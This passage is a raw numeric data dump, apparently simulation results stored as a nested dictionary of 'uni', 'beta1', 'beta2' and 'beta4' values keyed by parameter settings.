{'uni': 0.5618374463091304, 'beta1': 0.21529313809975378, 'beta2': 0.9323116397814922, 'beta4': [0.060725063535657646, 1.9415618379545583]}, 200: {'uni': 0.46281000290851027, 'beta1': 0.31836371463471935, 'beta2': 1.074339767464387, 'beta4': [0.06544350048523691, 2.4401579712107853]}, 150: {'uni': 0.45065414372867557, 'beta1': 0.2254781448755926, 'beta2': 0.921098529958321, 'beta4': [0.07493682860369427, 1.9884601872702625]}, 100: {'uni': 0.4818990994754038, 'beta1': 0.22179781725829084, 'beta2': 0.9626354691244079, 'beta4': [0.0673868816555839, 1.8541827841878982]}, 75: {'uni': 0.6113357053235765, 'beta1': 0.2970066066146257, 'beta2': 1.107979555092765, 'beta4': [0.07010660573358148, 1.8919338680785487]}, 50: {'uni': 0.4576323533580108, 'beta1': 0.21108840567426887, 'beta2': 1.0350342422943783, 'beta4': [0.07781723853206345, 1.7709725863663965]}, 30: {'uni': 0.4729226012285906, 'beta1': 0.2967398499465227, 'beta2': 1.1720397435138796, 'beta4': [0.10061020478239008, 1.5666290649592491]}, 20: {'uni': 0.5047530706836073, 'beta1': 0.3828449749320704, 'beta2': 0.9959358178346716, 'beta4': [0.09150679086653213, 1.5273098854169376]}, 10: {'uni': 0.7253485793653165, 'beta1': 0.7131398068127759, 'beta2': 1.154279478845462, 'beta4': [0.15865868787798984, 1.4651227700649136]}}, 20: {1000: {'uni': 0.8893011051968421, 'beta1': 0.48029489890964144, 'beta2': 1.138570061072868, 'beta4': [0.12016297491888765, 2.7450044819730346]}, 750: {'uni': 0.7842878860829648, 'beta1': 0.5280047378600626, 'beta2': 0.9907178324045341, 'beta4': [0.08074449655529863, 2.4628845216345465]}, 500: {'uni': 0.6495364657918996, 'beta1': 0.5571645541550105, 'beta2': 1.2153026888564329, 'beta4': [0.11212718774146183, 2.4826912142541158]}, 400: {'uni': 0.6790833244406554, 'beta1': 0.688222696542953, 'beta2': 1.0940594366814973, 'beta4': [0.09612572731484217, 2.6378171658296]}, 300: {'uni': 0.7497979123647319, 'beta1': 0.673346361400717, 'beta2': 1.2111769266572192, 'beta4': [0.10650625900424332, 
2.662378719953278]}, 200: {'uni': 0.7782799236279321, 'beta1': 0.5066133040115538, 'beta2': 1.5983486399311722, 'beta4': [0.10154176948982443, 2.18300393332201]}, 150: {'uni': 0.769284858919313, 'beta1': 0.7960425816447904, 'beta2': 1.6078106374025654, 'beta4': [0.09700106178564268, 2.47424633203668]}, 100: {'uni': 0.6623091331581044, 'beta1': 0.5188424165311809, 'beta2': 1.3778317192785996, 'beta4': [0.08048551825905041, 2.5782845351068673]}, 75: {'uni': 0.7617937241966218, 'beta1': 0.5291163469257404, 'beta2': 1.6061108763727754, 'beta4': [0.08975903590242737, 2.325750777699574]}, 50: {'uni': 0.7115988582438708, 'beta1': 0.5693966556621504, 'beta2': 1.3152266488463573, 'beta4': [0.08495826703441907, 2.142722449577546]}, 30: {'uni': 0.7034134256344454, 'beta1': 0.6037393201713395, 'beta2': 1.3551563258206014, 'beta4': [0.0931583019513541, 2.360556989567204]}, 20: {'uni': 0.7100758447852602, 'beta1': 0.6586909629351826, 'beta2': 1.3951430901746895, 'beta4': [0.08885578581538985, 2.13027761302959]}, 10: {'uni': 0.8763687869636916, 'beta1': 0.6621901686619684, 'beta2': 1.4397320052133586, 'beta4': [0.15413113554127414, 1.8900352885932123]}}, 10: {1000: {'uni': 2.0273680826515523, 'beta1': 2.359035556551498, 'beta2': 3.672756126961876, 'beta4': [0.2213782321311552, 4.345382606735576]}, 750: {'uni': 2.3490519213259775, 'beta1': 2.0119800010343014, 'beta2': 2.8645485706294185, 'beta4': [0.23441342363526224, 3.7887379248049053]}, 500: {'uni': 2.389001125272668, 'beta1': 1.8872657257523238, 'beta2': 2.6719189810271513, 'beta4': [0.20011018110379586, 3.6970066494557168]}, 400: {'uni': 2.255684049218137, 'beta1': 2.9094381086720404, 'beta2': 3.0637241743113166, 'beta4': [0.21926471174607634, 5.339869195559868]}, 300: {'uni': 1.7536409747411805, 'beta1': 3.849583292887527, 'beta2': 3.175605250509971, 'beta4': [0.17907412584005683, 4.480746714602472]}, 200: {'uni': 1.773862091385912, 'beta1': 4.078747745882778, 'beta2': 3.461277444009251, 'beta4': [0.19496297219634695, 
3.886693122290411]}, 150: {'uni': 2.265039971782233, 'beta1': 3.152798513179202, 'beta2': 3.4393350792778667, 'beta4': [0.15566060788335714, 4.093634455518538]}, 100: {'uni': 2.366653853665828, 'beta1': 4.4934014356822445, 'beta2': 3.800083106177682, 'beta4': [0.16039428725680271, 3.9289581935779605]}, 75: {'uni': 2.2874534331959575, 'beta1': 3.07963290214728, 'beta2': 3.0312126576316696, 'beta4': [0.19916744373968726, 4.206702906032036]}, 50: {'uni': 2.2089566943358725, 'beta1': 4.267458229985183, 'beta2': 3.5008369677013973, 'beta4': [0.17731566928548778, 3.7266964934594444]}, 30: {'uni': 1.882452851274314, 'beta1': 4.000525177515207, 'beta2': 2.51364631796368, 'beta4': [0.16839687927231317, 4.84316434096235]}, 20: {'uni': 2.445988350447573, 'beta1': 4.060592986449134, 'beta2': 3.2062441274392905, 'beta4': [0.21147740634989898, 3.5687642304126617]}, 10: {'uni': 2.2223725240828744, 'beta1': 4.131116767696193, 'beta2': 4.0318674319204195, 'beta4': [0.1798078313871271, 3.0758409111074045]}}}, 0.1: {1000: {1000: {'uni': 0.012708832597304081, 'beta1': 0.00033166037268448316, 'beta2': 0.21460865011093463, 'beta4': [0.0018516899147039188, 1.059075949409259]}, 750: {'uni': 0.015060860054651262, 'beta1': 0.0006641253071293576, 'beta2': 0.2162166847452195, 'beta4': [0.0025527950881468827, 1.0547627588805712]}, 500: {'uni': 0.023939712971963126, 'beta1': 0.0007901604824047292, 'beta2': 0.24516800594107138, 'beta4': [0.004049694984104264, 1.0444988223242697]}, 400: {'uni': 0.027519572187397166, 'beta1': 0.002460002937910002, 'beta2': 0.261583470206204, 'beta4': [0.004661086832628227, 1.0431727643760105]}, 300: {'uni': 0.03627168676673069, 'beta1': 0.003146307185794746, 'beta2': 0.28682321208602907, 'beta4': [0.005410896474224397, 1.0373268243809708]}, 200: {'uni': 0.06606377693153227, 'beta1': 0.007127748304258846, 'beta2': 0.33526098694387013, 'beta4': [0.007843924312649053, 1.031481235215888]}, 150: {'uni': 0.09086736508905224, 'beta1': 0.011997147118561492, 'beta2': 
0.39574485872929643, 'beta4': [0.012200131983621673, 1.0273614609515949]}, 100: {'uni': 0.11749233892140523, 'beta1': 0.0254874114936232, 'beta2': 0.40218091488595314, 'beta4': [0.016694345643181282, 1.0227124741537679]}, 75: {'uni': 0.13891536843765345, 'beta1': 0.0422040997632223, 'beta2': 0.4486272343137246, 'beta4': [0.02832653618019821, 1.0204206100863231]}, 50: {'uni': 0.2262449259542918, 'beta1': 0.08429066248193409, 'beta2': 0.5361554713125934, 'beta4': [0.03447726288853555, 1.0163471180661057]}, 30: {'uni': 0.3046689747877375, 'beta1': 0.143070283433812, 'beta2': 0.5687306521971477, 'beta4': [0.05140180541873996, 1.0146360366065286]}, 20: {'uni': 0.4296501536662478, 'beta1': 0.23259937226933894, 'beta2': 0.6661995228128583, 'beta4': [0.06742218487190954, 1.0114185216903036]}, 10: {'uni': 0.6748084625054919, 'beta1': 0.49249563656701206, 'beta2': 0.8271069531483622, 'beta4': [0.1102081844535559, 1.0086284465073807]}}, 750: {1000: {'uni': 0.016825551470189676, 'beta1': 0.0006897508449283568, 'beta2': 0.2633817678529082, 'beta4': [0.002694730956010692, 1.0791736796957117]}, 750: {'uni': 0.014048162967651316, 'beta1': 0.0007569685985984386, 'beta2': 0.23812376536046528, 'beta4': [0.0028744534835104148, 1.0751155224246156]}, 500: {'uni': 0.02812865188139113, 'beta1': 0.0009302726102285589, 'beta2': 0.28246276144047333, 'beta4': [0.003735251551528202, 1.0597034812793988]}, 400: {'uni': 0.028719991483692222, 'beta1': 0.0017210638478949442, 'beta2': 0.2521281788410891, 'beta4': [0.0057939649484265, 1.0568273537337944]}, 300: {'uni': 0.037442167799592474, 'beta1': 0.0029211389748540683, 'beta2': 0.28567597638856496, 'beta4': [0.007203252380980234, 1.0466619958682954]}, 200: {'uni': 0.06386556896150186, 'beta1': 0.007692212159565061, 'beta2': 0.3106853134678437, 'beta4': [0.008767209623206432, 1.0446977774575243]}, 150: {'uni': 0.07299108201427365, 'beta1': 0.009718847056601669, 'beta2': 0.35201252209709477, 'beta4': [0.01224241715996128, 1.037131011344825]}, 100: 
{'uni': 0.10404627177637138, 'beta1': 0.022002753992872198, 'beta2': 0.4027319974479996, 'beta4': [0.022041507551256105, 1.0283267345056883]}, 75: {'uni': 0.14415530253194253, 'beta1': 0.037313404141351224, 'beta2': 0.4487551520582601, 'beta4': [0.02308272957055226, 1.024847369129623]}, 50: {'uni': 0.18248580783173268, 'beta1': 0.06745752768881445, 'beta2': 0.5947234162875032, 'beta4': [0.03627165827218634, 1.023766184264096]}, 30: {'uni': 0.32010167971071957, 'beta1': 0.15819047328158758, 'beta2': 0.5964957292802823, 'beta4': [0.05138985807089626, 1.0189550791244228]}, 20: {'uni': 0.39132132239254896, 'beta1': 0.22935783878929317, 'beta2': 0.6897849051318254, 'beta4': [0.0708944891337828, 1.016073773033508]}, 10: {'uni': 0.633040103484694, 'beta1': 0.47854921461048383, 'beta2': 0.8056053943120505, 'beta4': [0.10927439293108314, 1.0129604700427997]}}, 500: {1000: {'uni': 0.02104866521905844, 'beta1': 0.0011076284762351462, 'beta2': 0.2455918455759565, 'beta4': [0.004128660183094929, 1.1046783319382874]}, 750: {'uni': 0.021757644812859883, 'beta1': 0.0013214567659403334, 'beta2': 0.2521007069597216, 'beta4': [0.003648828733603831, 1.098452444443017]}, 500: {'uni': 0.025306401204840658, 'beta1': 0.0012633210587387736, 'beta2': 0.2634180726409405, 'beta4': [0.004378750756189057, 1.0828752514482893]}, 400: {'uni': 0.03287825204093101, 'beta1': 0.0014649065692894452, 'beta2': 0.29674790610489143, 'beta4': [0.005038844169335943, 1.0820989472446443]}, 300: {'uni': 0.03919582437697649, 'beta1': 0.0032964478006695897, 'beta2': 0.28786217514683415, 'beta4': [0.005155953968189604, 1.0727548580615853]}, 200: {'uni': 0.05265772859784692, 'beta1': 0.007179735146244032, 'beta2': 0.32819508372958256, 'beta4': [0.010450188839043964, 1.0555283397540252]}, 150: {'uni': 0.07426215980201245, 'beta1': 0.01071226895358679, 'beta2': 0.346592044637774, 'beta4': [0.011794864375166105, 1.0557565101703543]}, 100: {'uni': 0.09473751106227296, 'beta1': 0.020243396397742374, 'beta2': 
0.40449469255381554, 'beta4': [0.016063490757556757, 1.043220122669047]}, 75: {'uni': 0.1526544667465516, 'beta1': 0.05565631922498948, 'beta2': 0.4948063047875674, 'beta4': [0.028189581940918265, 1.0438445988295184]}, 50: {'uni': 0.19264485864816036, 'beta1': 0.05989197049685187, 'beta2': 0.511997231910665, 'beta4': [0.036553687466457846, 1.0339604748795699]}, 30: {'uni': 0.28834715829751595, 'beta1': 0.1510890312715177, 'beta2': 0.589643860381959, 'beta4': [0.05150135594467901, 1.0281633332742106]}, 20: {'uni': 0.4234892194088218, 'beta1': 0.24125642146873605, 'beta2': 0.6532763993515733, 'beta4': [0.0787906083401277, 1.0224514492768015]}, 10: {'uni': 0.6373839649057689, 'beta1': 0.4687121970847603, 'beta2': 0.8065683045396626, 'beta4': [0.10620791541316066, 1.0176075022605533]}}, 400: {1000: {'uni': 0.029961593391199526, 'beta1': 0.0013213432517489214, 'beta2': 0.316112362691536, 'beta4': [0.0062188760201176375, 1.1284533576800397]}, 750: {'uni': 0.039777492934285896, 'beta1': 0.001508579177318669, 'beta2': 0.26143774121719054, 'beta4': [0.004763534234071238, 1.129866844282858]}, 500: {'uni': 0.027808281938736364, 'beta1': 0.002235578290604194, 'beta2': 0.2766486730364398, 'beta4': [0.005669313513005218, 1.1070477515133545]}, 400: {'uni': 0.03448721993106457, 'beta1': 0.002060896148615263, 'beta2': 0.2778739245365818, 'beta4': [0.005947201799245449, 1.1007850822479124]}, 300: {'uni': 0.038881825703913186, 'beta1': 0.0022205198114061166, 'beta2': 0.3449535264664368, 'beta4': [0.006411456500606179, 1.0867240695066167]}, 200: {'uni': 0.050601381926499364, 'beta1': 0.007855702997021598, 'beta2': 0.3119624149190063, 'beta4': [0.009781905195309765, 1.0781068487788759]}, 150: {'uni': 0.08081326564454214, 'beta1': 0.017136945406907373, 'beta2': 0.33243652782842975, 'beta4': [0.015865869842987972, 1.0692547767185392]}, 100: {'uni': 0.10273800778525288, 'beta1': 0.01999439686782297, 'beta2': 0.36994464265717686, 'beta4': [0.01653887961667779, 1.0555295877630724]}, 75: 
{'uni': 0.1259534595047032, 'beta1': 0.034388184145579245, 'beta2': 0.41308332325358277, 'beta4': [0.020239833747756678, 1.049561450582556]}, 50: {'uni': 0.1849579302990263, 'beta1': 0.07194816166882964, 'beta2': 0.5263002506691301, 'beta4': [0.030427049802672235, 1.0383309410150727]}, 30: {'uni': 0.29600170578233825, 'beta1': 0.12149484405151426, 'beta2': 0.5963678413155551, 'beta4': [0.055869335451423426, 1.0350485321179137]}, 20: {'uni': 0.4076696162001894, 'beta1': 0.27875125626527186, 'beta2': 0.6589684457465328, 'beta4': [0.07279883473388286, 1.0287125415345189]}, 10: {'uni': 0.6334440096496123, 'beta1': 0.4774986007980533, 'beta2': 0.8060685291046624, 'beta4': [0.10574684271567839, 1.0218591798545416]}}, 300: {1000: {'uni': 0.040572771380711144, 'beta1': 0.0028585526771383826, 'beta2': 0.3400160777578032, 'beta4': [0.007736399745246395, 1.1863024489259968]}, 750: {'uni': 0.04299416638630284, 'beta1': 0.002969868017451892, 'beta2': 0.2909040336627516, 'beta4': [0.007000230903639683, 1.1459452626888829]}, 500: {'uni': 0.05125391371795476, 'beta1': 0.002165638761144419, 'beta2': 0.30806868145586364, 'beta4': [0.005871679176627796, 1.1511125842098944]}, 400: {'uni': 0.04503334265214086, 'beta1': 0.0023602480297385017, 'beta2': 0.3301573120464285, 'beta4': [0.005448144002562095, 1.145418767540703]}, 300: {'uni': 0.044520962521187445, 'beta1': 0.003065998702340159, 'beta2': 0.3114521080701248, 'beta4': [0.006251618359843171, 1.118905728758287]}, 200: {'uni': 0.05777226508003848, 'beta1': 0.006768243637099554, 'beta2': 0.3236793485763856, 'beta4': [0.008218350087491232, 1.0969879140078251]}, 150: {'uni': 0.08387495266946396, 'beta1': 0.010696581160994418, 'beta2': 0.3565871015349815, 'beta4': [0.01144643737733734, 1.0873803983499324]}, 100: {'uni': 0.10709220720060389, 'beta1': 0.03215236993520353, 'beta2': 0.39545976429996976, 'beta4': [0.01766019366672807, 1.0818261167328507]}, 75: {'uni': 0.1401149186955662, 'beta1': 0.04354744217174392, 'beta2': 
0.4521360551441519, 'beta4': [0.024005024384320558, 1.0673838858138462]}, 50: {'uni': 0.19916349358035706, 'beta1': 0.05995508419162838, 'beta2': 0.4958590133326075, 'beta4': [0.032857961472088894, 1.0667769493972883]}, 30: {'uni': 0.30982126533332466, 'beta1': 0.1341973395058801, 'beta2': 0.5631122123039468, 'beta4': [0.052474472496597306, 1.0445759847739207]}, 20: {'uni': 0.44932270699336363, 'beta1': 0.2356147017439962, 'beta2': 0.6447178052807758, 'beta4': [0.07448923790120071, 1.0377852803437868]}, 10: {'uni': 0.6199778343521001, 'beta1': 0.4979560542799865, 'beta2': 0.8017114529605197, 'beta4': [0.1056367550997906, 1.033874766370601]}}, 200: {1000: {'uni': 0.06242982893046301, 'beta1': 0.006311543311467927, 'beta2': 0.3546209775823574, 'beta4': [0.011478130136808503, 1.2109739309006156]}, 750: {'uni': 0.052645349892701816, 'beta1': 0.00713333042905062, 'beta2': 0.35074257146111876, 'beta4': [0.0105252868048244, 1.2171709487406868]}, 500: {'uni': 0.0585692402437379, 'beta1': 0.005896496236549341, 'beta2': 0.3170457782036068, 'beta4': [0.010683921303693576, 1.1842346463599915]}, 400: {'uni': 0.06290504904317053, 'beta1': 0.006712146741219611, 'beta2': 0.3613015164572914, 'beta4': [0.010733396037533883, 1.1849658508273218]}, 300: {'uni': 0.06631100580163242, 'beta1': 0.005249788236707511, 'beta2': 0.3412605845181866, 'beta4': [0.011532162132481623, 1.1808880298303235]}, 200: {'uni': 0.05872088995242879, 'beta1': 0.010287989073223893, 'beta2': 0.44114280047537957, 'beta4': [0.00940073797560703, 1.1526662372069578]}, 150: {'uni': 0.08680495004311953, 'beta1': 0.010432318675711202, 'beta2': 0.369518802507579, 'beta4': [0.011286805439364736, 1.120530358597126]}, 100: {'uni': 0.10514360043392249, 'beta1': 0.022843793816391938, 'beta2': 0.3990470778297997, 'beta4': [0.015352115793283905, 1.1111111828101878]}, 75: {'uni': 0.1548412719042399, 'beta1': 0.03497861146212196, 'beta2': 0.445642088740141, 'beta4': [0.024145019301651638, 1.1051082659349265]}, 50: {'uni': 
0.19564761821360332, 'beta1': 0.06808577885293414, 'beta2': 0.4993873294578854, 'beta4': [0.027713298941496742, 1.0881906064783706]}, 30: {'uni': 0.3052472539595662, 'beta1': 0.12861243803016686, 'beta2': 0.5839087481358557, 'beta4': [0.05379333122729778, 1.0638546764114587]}, 20: {'uni': 0.42157212241427794, 'beta1': 0.2969555420165084, 'beta2': 0.6281606948650471, 'beta4': [0.06813417382770101, 1.0565341199655685]}, 10: {'uni': 0.6484698436861565, 'beta1': 0.5003510754676674, 'beta2': 0.7699596346968957, 'beta4': [0.11317240911394794, 1.0456765098967737]}}, 150: {1000: {'uni': 0.08366248595753015, 'beta1': 0.010446216149631336, 'beta2': 0.3932715459128066, 'beta4': [0.011561818709477627, 1.305602936248631]}, 750: {'uni': 0.07118697101283993, 'beta1': 0.01599980521069211, 'beta2': 0.4054713674024028, 'beta4': [0.015584562017383204, 1.2956283529452284]}, 500: {'uni': 0.08579946452689481, 'beta1': 0.011882995152922274, 'beta2': 0.41246933746770353, 'beta4': [0.01230725834002692, 1.2908217120418506]}, 400: {'uni': 0.10206478064567753, 'beta1': 0.010533507293093415, 'beta2': 0.37815775687446657, 'beta4': [0.013644516225509768, 1.2377646001800173]}, 300: {'uni': 0.06696098811374691, 'beta1': 0.015707664590499864, 'beta2': 0.36108061087642107, 'beta4': [0.011243078434367986, 1.2209644625062315]}, 200: {'uni': 0.07582632025632613, 'beta1': 0.018921317191341738, 'beta2': 0.47381975709885216, 'beta4': [0.009876617862388208, 1.1808296909941922]}, 150: {'uni': 0.07630227709705345, 'beta1': 0.011433401525463767, 'beta2': 0.35839012304833423, 'beta4': [0.012818986604319665, 1.1802180500312938]}, 100: {'uni': 0.10786524730960866, 'beta1': 0.023480822442160966, 'beta2': 0.3971224363546612, 'beta4': [0.01709550425962655, 1.151116255963359]}, 75: {'uni': 0.13969696753181376, 'beta1': 0.03894177698361236, 'beta2': 0.46715246191361925, 'beta4': [0.024033296209019752, 1.1264838497994534]}, 50: {'uni': 0.22699845146544836, 'beta1': 0.06872062711213502, 'beta2': 0.5219019735135487, 
'beta4': [0.031972705924561626, 1.127262590512302]}, 30: {'uni': 0.3054153298488651, 'beta1': 0.16648267461758534, 'beta2': 0.5606383325792897, 'beta4': [0.05706286020859661, 1.084204159768233]}, 20: {'uni': 0.4190052140990755, 'beta1': 0.23938694526158966, 'beta2': 0.6567567086969817, 'beta4': [0.06063104673629702, 1.0765768348326303]}, 10: {'uni': 0.6476542690569347, 'beta1': 0.5041556276697949, 'beta2': 0.7851190350954672, 'beta4': [0.10573852458138985, 1.0651944694890478]}}, 100: {1000: {'uni': 0.1036434876877887, 'beta1': 0.022364853152579772, 'beta2': 0.5292843993585943, 'beta4': [0.02314691582316915, 1.4467707103679326]}, 750: {'uni': 0.10335029362377335, 'beta1': 0.030060385136366257, 'beta2': 0.4208440719945956, 'beta4': [0.019280741475252636, 1.4088886174584125]}, 500: {'uni': 0.10376192559298011, 'beta1': 0.023777122143537794, 'beta2': 0.5616028046723718, 'beta4': [0.024082841464177725, 1.4090081022445462]}, 400: {'uni': 0.13631741533589026, 'beta1': 0.02388755267987828, 'beta2': 0.49195520157294537, 'beta4': [0.020305042646486506, 1.3649746644812781]}, 300: {'uni': 0.13432139541589827, 'beta1': 0.023480683123979638, 'beta2': 0.4061390685762313, 'beta4': [0.02388635447192918, 1.3133212077424719]}, 200: {'uni': 0.12739786607587839, 'beta1': 0.020107519579753312, 'beta2': 0.45952481877063966, 'beta4': [0.021929161477884124, 1.2871761359143647]}, 150: {'uni': 0.10898370722109206, 'beta1': 0.0294913822797383, 'beta2': 0.5126319119168943, 'beta4': [0.017117421378655046, 1.2559742846324167]}, 100: {'uni': 0.12173415399962331, 'beta1': 0.029129867966793198, 'beta2': 0.5070227168049106, 'beta4': [0.01683981545477253, 1.246721863000209]}, 75: {'uni': 0.13498049555541441, 'beta1': 0.040464719589934244, 'beta2': 0.493025079772468, 'beta4': [0.02304366181944447, 1.1964882870163205]}, 50: {'uni': 0.19534608713221155, 'beta1': 0.0741369784036267, 'beta2': 0.5183169385473728, 'beta4': [0.034831165872610405, 1.1949239176282795]}, 30: {'uni': 0.30805816742549175, 
'beta1': 0.1664021904025582, 'beta2': 0.5594858087243508, 'beta4': [0.05065502968190902, 1.1277215135863552]}, 20: {'uni': 0.4129540972085036, 'beta1': 0.22505442505495474, 'beta2': 0.6586789797514485, 'beta4': [0.06766096112265912, 1.1402723916542454]}, 10: {'uni': 0.6573864598611118, 'beta1': 0.4684846064556031, 'beta2': 0.794366053169467, 'beta4': [0.11468185689905351, 1.0863010136620521]}}, 75: {1000: {'uni': 0.18058180891528738, 'beta1': 0.037801701091263615, 'beta2': 0.5375554079408202, 'beta4': [0.022627377065022616, 1.6468214031174047]}, 750: {'uni': 0.17043142639842407, 'beta1': 0.042323861627189194, 'beta2': 0.5726471250293982, 'beta4': [0.027701870488874847, 1.4761000056892333]}, 500: {'uni': 0.1623261189491226, 'beta1': 0.04190800730982917, 'beta2': 0.5307750705381211, 'beta4': [0.02461383433205972, 1.4697198929879072]}, 400: {'uni': 0.16145797819679752, 'beta1': 0.03647548901238954, 'beta2': 0.5315701591627016, 'beta4': [0.02647811576481531, 1.4535080057475438]}, 300: {'uni': 0.15530089279897658, 'beta1': 0.03237409300356481, 'beta2': 0.5516168967599163, 'beta4': [0.021442907821948645, 1.4123882699990165]}, 200: {'uni': 0.17697523696823808, 'beta1': 0.04474700247588399, 'beta2': 0.5972192196010739, 'beta4': [0.02425642206461014, 1.3622012159367398]}, 150: {'uni': 0.18022118040525992, 'beta1': 0.04973126406029865, 'beta2': 0.5575656144691391, 'beta4': [0.041701851682596956, 1.3762461426964758]}, 100: {'uni': 0.16433779080943353, 'beta1': 0.05197785747946283, 'beta2': 0.7125558130922166, 'beta4': [0.021594167934128383, 1.277995498756572]}, 75: {'uni': 0.15574035820942522, 'beta1': 0.03753623782874999, 'beta2': 0.6594361088676222, 'beta4': [0.03041572556389392, 1.3035561091028944]}, 50: {'uni': 0.18528367625092257, 'beta1': 0.058418019883555695, 'beta2': 0.5859983026896285, 'beta4': [0.03287075645889381, 1.197963424643406]}, 30: {'uni': 0.33717193717239086, 'beta1': 0.15972206611315357, 'beta2': 0.6312902712515196, 'beta4': [0.053274124739167164, 
1.1818333324712798]}, 20: {'uni': 0.3778933771594146, 'beta1': 0.24660391594637412, 'beta2': 0.6258005697368938, 'beta4': [0.06425956306492152, 1.1835172283435373]}, 10: {'uni': 0.6436618954411614, 'beta1': 0.46316810126751673, 'beta2': 0.7811380357663973, 'beta4': [0.10631223882126731, 1.1150057118472687]}}, 50: {1000: {'uni': 0.25808978521407333, 'beta1': 0.15286500185699975, 'beta2': 0.5826925265510525, 'beta4': [0.034467286889795036, 1.5864361747408757]}, 750: {'uni': 0.2456412375307066, 'beta1': 0.09688410933656752, 'beta2': 0.6623046558218882, 'beta4': [0.0386809666782265, 1.7464944613556568]}, 500: {'uni': 0.2690821708539631, 'beta1': 0.10807263816836116, 'beta2': 0.6208916018976451, 'beta4': [0.04208865557048511, 1.8588053084450398]}, 400: {'uni': 0.30779724152757976, 'beta1': 0.07008374742747679, 'beta2': 0.6563945987856405, 'beta4': [0.037440644670713945, 1.567814559277183]}, 300: {'uni': 0.24357058167621404, 'beta1': 0.07610853729969821, 'beta2': 0.6351194247134633, 'beta4': [0.04234563975675384, 1.6172451253474347]}, 200: {'uni': 0.2363976999457054, 'beta1': 0.08107649857407076, 'beta2': 0.6736222653167869, 'beta4': [0.036278935272213875, 1.5304741409120481]}, 150: {'uni': 0.2610121772600879, 'beta1': 0.0970721039952632, 'beta2': 0.6373563878119448, 'beta4': [0.039267605566479145, 1.6152863379484848]}, 100: {'uni': 0.25887956260664496, 'beta1': 0.0749904503307929, 'beta2': 0.6053419211526976, 'beta4': [0.04457433007738977, 1.4866090790047208]}, 75: {'uni': 0.26824734647328496, 'beta1': 0.12671407341083857, 'beta2': 0.7088195394325436, 'beta4': [0.036659734617877866, 1.4757908941788034]}, 50: {'uni': 0.2157848876945146, 'beta1': 0.179047877195215, 'beta2': 0.6430388460295624, 'beta4': [0.0391000990025914, 1.3557498703015833]}, 30: {'uni': 0.3192054118087819, 'beta1': 0.1401721849908211, 'beta2': 0.8343938671057323, 'beta4': [0.04470518427368649, 1.2932248331626337]}, 20: {'uni': 0.44510976621687803, 'beta1': 0.21980400379396323, 'beta2': 
0.700861422059113, 'beta4': [0.0769617944142653, 1.2345363706331847]}, 10: {'uni': 0.6347832511266515, 'beta1': 0.46188004670925575, 'beta2': 0.7495583632205935, 'beta4': [0.1305758638756061, 1.2022133212025055]}}, 30: {1000: {'uni': 0.42892879393806227, 'beta1': 0.2900339381216153, 'beta2': 0.9179423439811932, 'beta4': [0.06714029920409238, 2.1317261773472023]}, 750: {'uni': 0.4319538785876898, 'beta1': 0.27188371653759374, 'beta2': 0.9805852295742616, 'beta4': [0.070835223582246, 1.9229053732675119]}, 500: {'uni': 0.5337901444492364, 'beta1': 0.2829226601033528, 'beta2': 0.9905448799057903, 'beta4': [0.07612682556429423, 2.076515079639593]}, 400: {'uni': 0.39881851895745213, 'beta1': 0.26899106022077685, 'beta2': 0.9024444948214578, 'beta4': [0.05401799877222632, 1.8734518365407848]}, 300: {'uni': 0.6739736484193996, 'beta1': 0.2727368263724961, 'beta2': 0.9523117920073443, 'beta4': [0.05673109471662844, 2.063349821863002]}, 200: {'uni': 0.5330467944857724, 'beta1': 0.23457124841939445, 'beta2': 0.9209146724782004, 'beta4': [0.05392848614071637, 2.1843840064284774]}, 150: {'uni': 0.42169483702592286, 'beta1': 0.23102624314533526, 'beta2': 1.0957735143101772, 'beta4': [0.059481382178213825, 2.1216513918653437]}, 100: {'uni': 0.6626893623786265, 'beta1': 0.26768286418498294, 'beta2': 0.9158900858984962, 'beta4': [0.06812396698026751, 1.699363398801483]}, 75: {'uni': 0.40272005064764316, 'beta1': 0.30576524079527273, 'beta2': 0.8537642594078427, 'beta4': [0.05500177232308054, 1.759340527948887]}, 50: {'uni': 0.4454592863478265, 'beta1': 0.22504133999635, 'beta2': 0.895156147172035, 'beta4': [0.06047032418708357, 1.6131334609036276]}, 30: {'uni': 0.4770799136690089, 'beta1': 0.28771044466108114, 'beta2': 0.9915883541772491, 'beta4': [0.05533692052705431, 1.5508614397335567]}, 20: {'uni': 0.47782291469689375, 'beta1': 0.2938634148011197, 'beta2': 1.0424979003898318, 'beta4': [0.0647423513839497, 1.4508953034317449]}, 10: {'uni': 0.7269557754136924, 'beta1': 
0.543897763233955, 'beta2': 1.4307116481814752, 'beta4': [0.10876709935086068, 1.325984870412566]}}, 20: {1000: {'uni': 0.7184217429237197, 'beta1': 0.4206672630068364, 'beta2': 1.1613123688886902, 'beta4': [0.0965283978439124, 2.269289374072948]}, 750: {'uni': 0.8534940710908991, 'beta1': 0.5750736583955173, 'beta2': 1.5370822261631976, 'beta4': [0.11705211724316403, 2.3985476027245425]}, 500: {'uni': 0.7100015488711899, 'beta1': 0.6055030167508085, 'beta2': 1.3366756110977158, 'beta4': [0.08901810252717048, 2.5039934903960024]}, 400: {'uni': 1.024882066657459, 'beta1': 0.6339328801184981, 'beta2': 1.3420862247975562, 'beta4': [0.11404947586800851, 2.286363998147505]}, 300: {'uni': 0.7865904251052587, 'beta1': 0.6071705295391215, 'beta2': 1.2856926816307097, 'beta4': [0.12113879919712968, 2.5946298846866784]}, 200: {'uni': 0.9392908385222309, 'beta1': 0.5745637648665203, 'beta2': 1.1427799247137727, 'beta4': [0.11765217795293076, 2.3656722555394056]}, 150: {'uni': 1.0463030353811855, 'beta1': 0.505199427703051, 'beta2': 1.136751565860195, 'beta4': [0.08916754586166624, 2.3244992955685637]}, 100: {'uni': 0.7096332746322297, 'beta1': 0.6584700089137518, 'beta2': 1.1955612879172697, 'beta4': [0.0793400828260651, 2.0810546674001063]}, 75: {'uni': 0.5686801021941732, 'beta1': 0.9064292489368356, 'beta2': 1.3967282306451674, 'beta4': [0.08123013465573295, 2.0910440423359367]}, 50: {'uni': 0.776933863952061, 'beta1': 0.6292461657268993, 'beta2': 1.554076323925928, 'beta4': [0.08839935153937976, 2.0327820301000203]}, 30: {'uni': 0.8454812842111926, 'beta1': 0.5691239590988605, 'beta2': 1.5452301545383769, 'beta4': [0.07962479640843732, 1.7801768614752502]}, 20: {'uni': 0.7155766744358403, 'beta1': 0.5367615346103896, 'beta2': 1.3929673945151635, 'beta4': [0.08547240159964724, 1.735089005961175]}, 10: {'uni': 0.814156374135484, 'beta1': 0.6943350919872927, 'beta2': 1.2256108824087348, 'beta4': [0.11175964139287464, 1.531470926335231]}}, 10: {1000: {'uni': 
